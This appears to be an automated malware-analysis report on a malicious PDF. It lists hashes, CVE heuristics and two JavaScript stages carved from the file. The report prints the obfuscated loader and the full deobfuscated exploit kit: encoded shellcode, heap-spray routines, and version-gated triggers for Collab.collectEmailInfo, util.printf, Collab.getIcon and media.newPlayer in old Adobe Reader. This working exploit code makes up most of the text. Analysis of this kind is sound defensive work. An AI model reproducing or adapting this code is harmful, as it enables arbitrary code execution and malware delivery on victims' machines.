Malicious PDF — malware analysis report

Static analysis result for SHA-256 294189f71516e7fc…

MALICIOUS

PDF

Size: 44.6 KB · First seen: 2012-10-30
MD5: 76e31d7aa3720710d9a1f9e230259b20 SHA-1: 7c3a102eeee925e641effc8845b793355d273346 SHA-256: 294189f71516e7fccce6c98a5f3c34ac68ad1dcf463a10951703ed5940a3eb6b
Risk score: 408

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (9)

  • media.newPlayer — CVE-2009-4324 — severity: critical; match: exact CVE; rule: CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 — severity: critical; match: exact CVE; rule: CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 — severity: critical; match: exact CVE; rule: CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 — severity: critical; match: exact CVE; rule: CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher — severity: critical; match: likely CVE; rule: PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit — severity: critical; rule: PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than the independent API-keyword matches listed above: the PDF selects an old Reader vulnerability by viewer version and runs the corresponding heap-sprayed Acrobat JavaScript exploit path.
  • JavaScript action — severity: low; 1 related finding; rule: PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream — severity: low; rule: PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact — severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0001_000.js | pdf-javascript-stream | PDF /JS object 1 at offset 0xAFD2 | 447 bytes
SHA-256: c8b8d65015f51511875f3e5cbc7b7dd29c1fde22d1c4e9b7a5c3062f1e0dfc8b
Preview script
First 1,000 lines of the extracted script
ermsk='';
qwe = ('nhsthn','ntrht').substr;
var g = qwe();
t='le';
a=["e","a","n","b","w",'v'];
e=g[a[0]+a[5]+a[1]+t[0]];
e('ahfw=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t);
wsewt=e('String.fro'+ahfw.substr(1,9));
xeodx = e(ahfw.substr(10)['rep'+'l'+('nsdnf','ace')](/u/g,','));
e('k=xeodx.length');
for (i = 0; i < k; i+=2) {
	cumf = xeodx[i+1] + ('erybjkerl',xeodx[i]);
	ermsk += wsewt(cumf);
}
e(ermsk);
legacy_pdfkit_stage_000.js | deobfuscated-js | metadata bmCharCode pair decoded JavaScript at offset 0x37 | 3654 bytes
SHA-256: 91de71c217db0388e6a231ad6f228325a4aa344d6ca9eec05de3ec1ddfa8bd28
Detection
ClamAV: No threats found (a single-engine miss on the carved stage does not contradict the heuristic findings above, which were raised on the deobfuscated content)
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s) and 1 long base64-like blob(s). Note: in the preview below the long blob is a %u-escaped string passed to unescape(), not base64; the heuristic label refers to its length and character distribution, not its encoding.
Preview script
First 1,000 lines of the extracted script
var bjsg='%u9090%u9090%u16eb%u3cb9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u1734%ue2aa%uc3fa%ue5e8%uffff%ufeff%u161b%u1717%u9649%u4bfb%u1716%u9e17%u9af0%u0758%u789a%u2643%u40cc%u4446%u4444%u4444%u4444%u4442%u7f44%u1613%u1717%u4142%u7f44%u7978%u1717%u627f%u7b65%u437a%u997f%u1959%ufffb%u175f%u1717%uff47%u176b%u1717%uc7e8%ud394%u7f1f%uf858%u1258%uff47%u177b%u1717%uc7e8%ud792%u0062%u437d%ue44e%u7fbd%ue965%u01a4%u0aff%u1717%u4717%u46ff%u1717%ue817%u44c7%ue97d%u9e7f%u1678%uffaa%u171f%u1717%uff47%u172b%u1717%uc7e8%u2677%u73d7%u479c%u9c27%u1b45%u459c%u9c03%u3f65%u0fae%u1717%u2617%u26e8%ubbd7%u762b%u156b%u373b%ud8d6%u161a%uf5d0%u96e7%u4ce8%u5dab%u9c7d%u0755%u059c%uce62%u539e%u0b33%ud476%u9c77%u337b%u9c33%u2b52%u439c%u6f12%ufd16%u5d9c%u9c0f%u374d%ufc16%u23f4%u9c5e%u9c23%uf916%ue826%ud726%ubbeb%ud793%u1063%ud8d6%u161a%ufcd0%u2ce3%u336b%u623f%u9cf6%u334d%ufc16%u9c71%u5c1b%u4d9c%u160b%u9cfc%u9c13%uff16%u539e%u0b33%ud576%u171f%uf8ff%ue8e9%u7fe8%u6363%u2d67%u3838%u7873%u767a%u797e%u787a%u7863%u7e39%u7179%u3878%u3973%u7f67%u2867%u2a71%u2424%u7231%u222a%u0017';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}
ra=ra.substring(0,qy/2);return ra;} 
function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} 
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} 
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} 
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} 
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} 
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} 
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} 
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} 
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} 
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} 
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} 
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} 
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}